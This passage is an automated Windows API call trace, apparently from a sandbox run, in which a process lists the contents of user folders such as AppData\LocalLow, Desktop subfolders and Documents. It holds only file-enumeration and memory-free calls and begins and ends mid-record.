ftLastWriteTime.dwLowDateTime=0xd98d5b80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c818 | out: hHeap=0xcd0000) returned 1 [0165.831] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd98d5b80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd98d5b80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.831] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.831] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a3699e0, ftCreationTime.dwHighDateTime=0x1d5dc09, ftLastAccessTime.dwLowDateTime=0xa8ee3ff0, ftLastAccessTime.dwHighDateTime=0x1d5e01c, ftLastWriteTime.dwLowDateTime=0xa8ee3ff0, ftLastWriteTime.dwHighDateTime=0x1d5e01c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gOI6FhRK7 r-pcVYvKd", cAlternateFileName="GOI6FH~1")) returned 1 [0165.831] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fa9f050, ftCreationTime.dwHighDateTime=0x1d5e17a, ftLastAccessTime.dwLowDateTime=0xb5cca540, ftLastAccessTime.dwHighDateTime=0x1d5dbbc, ftLastWriteTime.dwLowDateTime=0xb5cca540, ftLastWriteTime.dwHighDateTime=0x1d5dbbc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V4xTSO7L1q6Ip", cAlternateFileName="V4XTSO~1")) returned 1 [0165.831] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef26b590, ftCreationTime.dwHighDateTime=0x1d5e2e4, ftLastAccessTime.dwLowDateTime=0x47d67d70, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0x47d67d70, ftLastWriteTime.dwHighDateTime=0x1d5e67c, nFileSizeHigh=0x0, nFileSizeLow=0x148ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x5rI0NtYZ.flv", cAlternateFileName="X5RI0N~1.FLV")) returned 1 [0165.831] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef26b590, ftCreationTime.dwHighDateTime=0x1d5e2e4, ftLastAccessTime.dwLowDateTime=0x47d67d70, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0x47d67d70, ftLastWriteTime.dwHighDateTime=0x1d5e67c, nFileSizeHigh=0x0, nFileSizeLow=0x148ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x5rI0NtYZ.flv", cAlternateFileName="X5RI0N~1.FLV")) returned 0 [0165.831] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c7c0 | out: hHeap=0xcd0000) returned 1 [0165.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c710 | out: hHeap=0xcd0000) returned 1 [0165.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44ef0 | out: hHeap=0xcd0000) returned 1 [0165.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c660 | out: hHeap=0xcd0000) returned 1 [0165.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c3f8 | out: hHeap=0xcd0000) returned 1 [0165.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0165.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0165.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b450f8 | out: hHeap=0xcd0000) returned 1 [0165.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45160 | out: hHeap=0xcd0000) returned 1 [0165.831] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c558 | out: hHeap=0xcd0000) returned 1 [0165.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b451c8 | out: hHeap=0xcd0000) returned 1 [0165.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362ca80 | out: hHeap=0xcd0000) returned 1 [0165.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45230 | out: hHeap=0xcd0000) returned 1 [0165.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0165.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cb30 | out: hHeap=0xcd0000) returned 1 [0165.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45298 | out: hHeap=0xcd0000) returned 1 [0165.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cb88 | out: hHeap=0xcd0000) returned 1 [0165.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45300 | out: hHeap=0xcd0000) returned 1 [0165.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cbe0 | out: hHeap=0xcd0000) returned 1 [0165.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0165.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f58 | out: hHeap=0xcd0000) returned 1 [0165.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71930 | out: hHeap=0xcd0000) returned 1 [0165.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c6b8 | out: hHeap=0xcd0000) returned 1 [0165.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0165.832] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.832] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.832] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0165.832] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0165.832] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.832] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.832] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.832] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.832] PathFindFileNameW (pszPath="") returned="" [0165.833] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.833] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2a20 | out: hHeap=0xcd0000) returned 1 [0165.833] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.833] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0165.833] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0165.833] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0165.833] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0165.833] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.833] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.833] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71930 | out: hHeap=0xcd0000) returned 1 [0165.833] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.833] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.833] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\") returned="5RddQRlUxLC956\\" [0165.833] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0165.834] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.834] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.834] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.834] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.834] PathFindFileNameW (pszPath="") returned="" [0165.834] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe986430, ftCreationTime.dwHighDateTime=0x1d5dc20, ftLastAccessTime.dwLowDateTime=0xe477ab20, ftLastAccessTime.dwHighDateTime=0x1d5e359, ftLastWriteTime.dwLowDateTime=0xe477ab20, ftLastWriteTime.dwHighDateTime=0x1d5e359, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.834] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0165.834] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe986430, ftCreationTime.dwHighDateTime=0x1d5dc20, ftLastAccessTime.dwLowDateTime=0xe477ab20, ftLastAccessTime.dwHighDateTime=0x1d5e359, ftLastWriteTime.dwLowDateTime=0xe477ab20, ftLastWriteTime.dwHighDateTime=0x1d5e359, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.834] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae90d7c0, ftCreationTime.dwHighDateTime=0x1d5e575, ftLastAccessTime.dwLowDateTime=0xadd0f950, ftLastAccessTime.dwHighDateTime=0x1d5d873, ftLastWriteTime.dwLowDateTime=0xadd0f950, ftLastWriteTime.dwHighDateTime=0x1d5d873, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1dBcNb8", cAlternateFileName="")) returned 1 [0165.834] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbdcfd70, ftCreationTime.dwHighDateTime=0x1d5e7ce, ftLastAccessTime.dwLowDateTime=0x8870d880, ftLastAccessTime.dwHighDateTime=0x1d5d8fd, ftLastWriteTime.dwLowDateTime=0x8870d880, ftLastWriteTime.dwHighDateTime=0x1d5d8fd, nFileSizeHigh=0x0, nFileSizeLow=0xc141, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1YBskjnaQkYli5_rl5k.flv", cAlternateFileName="1YBSKJ~1.FLV")) returned 1 [0165.834] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d8ba880, ftCreationTime.dwHighDateTime=0x1d5dcde, ftLastAccessTime.dwLowDateTime=0x398d4940, ftLastAccessTime.dwHighDateTime=0x1d5e133, ftLastWriteTime.dwLowDateTime=0x398d4940, ftLastWriteTime.dwHighDateTime=0x1d5e133, nFileSizeHigh=0x0, nFileSizeLow=0x15b20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4Blv.jpg", cAlternateFileName="")) returned 1 [0165.834] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dba4350, ftCreationTime.dwHighDateTime=0x1d5db3b, ftLastAccessTime.dwLowDateTime=0x2b4315e0, ftLastAccessTime.dwHighDateTime=0x1d5df67, ftLastWriteTime.dwLowDateTime=0x2b4315e0, ftLastWriteTime.dwHighDateTime=0x1d5df67, nFileSizeHigh=0x0, nFileSizeLow=0x12f41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B5FYW04taLjBYUYnSE.mp4", cAlternateFileName="B5FYW0~1.MP4")) returned 1 [0165.834] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa66333b0, ftCreationTime.dwHighDateTime=0x1d5dcb8, ftLastAccessTime.dwLowDateTime=0x210e80b0, ftLastAccessTime.dwHighDateTime=0x1d5dafc, ftLastWriteTime.dwLowDateTime=0x210e80b0, ftLastWriteTime.dwHighDateTime=0x1d5dafc, nFileSizeHigh=0x0, nFileSizeLow=0x3d57, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ORl97 rSVzgg.m4a", cAlternateFileName="ORL97R~1.M4A")) returned 1 [0165.834] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ad55b40, ftCreationTime.dwHighDateTime=0x1d5d959, ftLastAccessTime.dwLowDateTime=0xb485a810, ftLastAccessTime.dwHighDateTime=0x1d5d9d4, ftLastWriteTime.dwLowDateTime=0xb485a810, ftLastWriteTime.dwHighDateTime=0x1d5d9d4, nFileSizeHigh=0x0, nFileSizeLow=0xf228, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zbdm9r2.bmp", cAlternateFileName="")) returned 1 [0165.834] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ad55b40, ftCreationTime.dwHighDateTime=0x1d5d959, ftLastAccessTime.dwLowDateTime=0xb485a810, ftLastAccessTime.dwHighDateTime=0x1d5d9d4, ftLastWriteTime.dwLowDateTime=0xb485a810, ftLastWriteTime.dwHighDateTime=0x1d5d9d4, nFileSizeHigh=0x0, nFileSizeLow=0xf228, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zbdm9r2.bmp", cAlternateFileName="")) returned 0 [0165.834] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.835] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.835] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0165.835] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.835] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\") returned="xxuaxzQ\\" [0165.835] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0165.835] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.835] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.835] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: hHeap=0xcd0000) returned 1 [0165.835] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.835] PathFindFileNameW (pszPath="") returned="" [0165.835] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x952bfeb0, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x7579f170, ftLastAccessTime.dwHighDateTime=0x1d5dccd, ftLastWriteTime.dwLowDateTime=0x7579f170, ftLastWriteTime.dwHighDateTime=0x1d5dccd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.835] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ad0 | out: hHeap=0xcd0000) returned 1 [0165.835] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x952bfeb0, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x7579f170, ftLastAccessTime.dwHighDateTime=0x1d5dccd, ftLastWriteTime.dwLowDateTime=0x7579f170, ftLastWriteTime.dwHighDateTime=0x1d5dccd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.835] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x705537b0, ftCreationTime.dwHighDateTime=0x1d5e784, ftLastAccessTime.dwLowDateTime=0xce208c00, ftLastAccessTime.dwHighDateTime=0x1d5d8d9, ftLastWriteTime.dwLowDateTime=0xce208c00, ftLastWriteTime.dwHighDateTime=0x1d5d8d9, nFileSizeHigh=0x0, nFileSizeLow=0xec1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2UgGdV0vuu.bmp", cAlternateFileName="2UGGDV~1.BMP")) returned 1 [0165.836] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59c1d670, ftCreationTime.dwHighDateTime=0x1d5d870, ftLastAccessTime.dwLowDateTime=0x5c840ca0, ftLastAccessTime.dwHighDateTime=0x1d5e506, ftLastWriteTime.dwLowDateTime=0x5c840ca0, ftLastWriteTime.dwHighDateTime=0x1d5e506, nFileSizeHigh=0x0, nFileSizeLow=0x15e73, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2X6VH2.m4a", cAlternateFileName="")) returned 1 [0165.836] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42482070, ftCreationTime.dwHighDateTime=0x1d5e7f3, ftLastAccessTime.dwLowDateTime=0xe27af3f0, ftLastAccessTime.dwHighDateTime=0x1d5e5ce, ftLastWriteTime.dwLowDateTime=0xe27af3f0, ftLastWriteTime.dwHighDateTime=0x1d5e5ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eL7ZGLErx", cAlternateFileName="EL7ZGL~1")) returned 1 [0165.836] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf32359e0, ftCreationTime.dwHighDateTime=0x1d5d8b8, ftLastAccessTime.dwLowDateTime=0x7c2ce1a0, ftLastAccessTime.dwHighDateTime=0x1d5dfd2, ftLastWriteTime.dwLowDateTime=0x7c2ce1a0, ftLastWriteTime.dwHighDateTime=0x1d5dfd2, nFileSizeHigh=0x0, nFileSizeLow=0x81e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fes_XROkSU6uT2U.png", cAlternateFileName="FES_XR~1.PNG")) returned 1 [0165.836] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6afb030, ftCreationTime.dwHighDateTime=0x1d5df07, ftLastAccessTime.dwLowDateTime=0x6bed00e0, ftLastAccessTime.dwHighDateTime=0x1d5de97, ftLastWriteTime.dwLowDateTime=0x6bed00e0, ftLastWriteTime.dwHighDateTime=0x1d5de97, nFileSizeHigh=0x0, nFileSizeLow=0x13460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M_TQtkh1FRb6dyX3oc1C.swf", cAlternateFileName="M_TQTK~1.SWF")) returned 1 [0165.836] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37605670, ftCreationTime.dwHighDateTime=0x1d5e4bd, ftLastAccessTime.dwLowDateTime=0x5d19c510, ftLastAccessTime.dwHighDateTime=0x1d5e597, ftLastWriteTime.dwLowDateTime=0x5d19c510, ftLastWriteTime.dwHighDateTime=0x1d5e597, nFileSizeHigh=0x0, nFileSizeLow=0x13439, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NOTJBOAQYbhO9I2wCea.m4a", cAlternateFileName="NOTJBO~1.M4A")) returned 1 [0165.836] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3392880, ftCreationTime.dwHighDateTime=0x1d5e5d5, ftLastAccessTime.dwLowDateTime=0x8ac14960, ftLastAccessTime.dwHighDateTime=0x1d5d9c7, ftLastWriteTime.dwLowDateTime=0x8ac14960, ftLastWriteTime.dwHighDateTime=0x1d5d9c7, nFileSizeHigh=0x0, nFileSizeLow=0x9a1a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wsTyr.mkv", cAlternateFileName="")) returned 1 [0165.836] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3392880, ftCreationTime.dwHighDateTime=0x1d5e5d5, ftLastAccessTime.dwLowDateTime=0x8ac14960, ftLastAccessTime.dwHighDateTime=0x1d5d9c7, ftLastWriteTime.dwLowDateTime=0x8ac14960, ftLastWriteTime.dwHighDateTime=0x1d5d9c7, nFileSizeHigh=0x0, nFileSizeLow=0x9a1a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wsTyr.mkv", cAlternateFileName="")) returned 0 [0165.836] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.836] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bc0 | out: hHeap=0xcd0000) returned 1 [0165.836] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71930 | out: hHeap=0xcd0000) returned 1 [0165.836] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.836] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0165.836] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0165.836] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.836] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.836] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9f8 | out: 